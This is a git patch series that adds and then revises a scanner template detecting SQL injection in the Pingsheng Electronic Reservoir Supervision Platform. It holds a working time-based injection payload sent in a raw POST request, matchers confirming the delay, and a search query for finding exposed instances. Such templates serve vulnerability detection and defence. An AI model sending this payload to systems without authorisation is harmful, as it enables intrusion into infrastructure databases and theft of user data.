From 849b0a88b4dff07a0911b93d3f2d4ec517eaa55d Mon Sep 17 00:00:00 2001
From: Kazgangap <halilkirazkaya@yandex.com>
Date: Tue, 9 Jul 2024 02:11:54 +0300
Subject: [PATCH 1/3] add pingsheng sqli

---
 .../other/pingsheng-electronic-sqli.yaml      | 33 +++++++++++++++++++
 1 file changed, 33 insertions(+)
 create mode 100644 http/vulnerabilities/other/pingsheng-electronic-sqli.yaml

diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
new file mode 100644
index 0000000000..f69a00a4cd
--- /dev/null
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -0,0 +1,33 @@
+id: pingsheng-electronic-sqli
+
+info:
+  name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
+  author: securityforeveryone
+  severity: critical
+  description: |
+    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
+  reference:
+    - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: "js/PSExtend.js"
+  tags: sqli,pingsheng
+
+http:
+  - raw:
+      - |
+        @timeout 20s
+        POST /WebServices/SIMMaintainService.asmx/GetAllRechargeRecordsBySIMCardId HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        loginIdentifer=&simcardId=';WAITFOR DELAY '0:0:6'--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+          - 'contains_all(body,"Result","false","Message","?xml version")'
+          - 'status_code == 200'
+        condition: and

From cdd6abec83e2d7457562eec390a8a4db358bc3d3 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 9 Jul 2024 15:49:53 +0530
Subject: [PATCH 2/3] minor update

---
 http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
index f69a00a4cd..f17d0dfe2c 100644
--- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -5,11 +5,12 @@ info:
   author: securityforeveryone
   severity: critical
   description: |
-    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronic Reservoir Supervision Platform. Attackers can access data in the database without authorization, thereby stealing user data and causing user information leakage.
+    There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
   reference:
     - https://github.com/wy876/POC/blob/main/%E5%B9%B3%E5%8D%87%E7%94%B5%E5%AD%90%E6%B0%B4%E5%BA%93%E7%9B%91%E7%AE%A1%E5%B9%B3%E5%8F%B0GetAllRechargeRecordsBySIMCardId%E6%8E%A5%E5%8F%A3%E5%A4%84%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
+    - https://github.com/zan8in/pxplan/blob/main/goby_pocs/10-13-crack/redteam_20230316121609/CVD-2022-5560.go
   metadata:
-    verified: true
+    verified: "true"
     max-request: 1
     fofa-query: "js/PSExtend.js"
   tags: sqli,pingsheng
@@ -28,6 +29,7 @@ http:
       - type: dsl
         dsl:
           - 'duration>=6'
-          - 'contains_all(body,"Result","false","Message","?xml version")'
+          - 'contains_all(body,"Result","false","Message")'
+          - 'contains(content_type,"text/xml")'
           - 'status_code == 200'
         condition: and

From d5ad8ecd14f5e1d47dd02f113d1c0107713f154b Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Tue, 9 Jul 2024 15:54:07 +0530
Subject: [PATCH 3/3] update severity

---
 http/vulnerabilities/other/pingsheng-electronic-sqli.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
index f17d0dfe2c..0b14c45d62 100644
--- a/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
+++ b/http/vulnerabilities/other/pingsheng-electronic-sqli.yaml
@@ -3,7 +3,7 @@ id: pingsheng-electronic-sqli
 info:
   name: Pingsheng Electronic Reservoir Supervision Platform - Sql Injection
   author: securityforeveryone
-  severity: critical
+  severity: high
   description: |
     There is a SQL injection vulnerability in the GetAllRechargeRecordsBySIMCardId interface of Pingsheng Electronics Reservoir Supervision Platform. An attacker can access the data in the database without authorization, thereby stealing user data and leaking user information.
   reference: